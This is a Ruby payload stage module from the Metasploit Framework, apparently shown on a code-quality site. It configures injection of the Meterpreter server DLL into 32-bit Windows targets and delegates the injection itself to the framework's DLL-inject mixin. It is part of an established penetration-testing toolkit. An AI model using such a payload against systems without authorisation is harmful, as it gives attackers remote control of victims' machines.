rapid7/metasploit-framework

View on GitHub
modules/payloads/stages/windows/patchupmeterpreter.rb

Summary

Maintainability
A
0 mins
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##


###
#
# Injects the meterpreter server instance DLL via the DLL injection payload.
#
###
module MetasploitModule

  include Msf::Payload::Windows::DllInject
  include Msf::Sessions::MeterpreterOptions

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Windows Meterpreter (skape/jt Injection)',
      'Description'   => 'Inject the meterpreter server DLL (staged)',
      'Author'        => 'skape',
      'License'       => MSF_LICENSE,
      'Session'       => Msf::Sessions::Meterpreter_x86_Win))

    # Don't let people set the library name option
    options.remove_option('LibraryName')
    options.remove_option('DLL')
  end

  #
  # The library name that we're injecting the DLL as has to be metsrv.dll for
  # extensions to make use of.
  #
  def library_name
    "metsrv.dll"
  end

  def library_path
    MetasploitPayloads.meterpreter_path('metsrv','x86.dll')
  end
end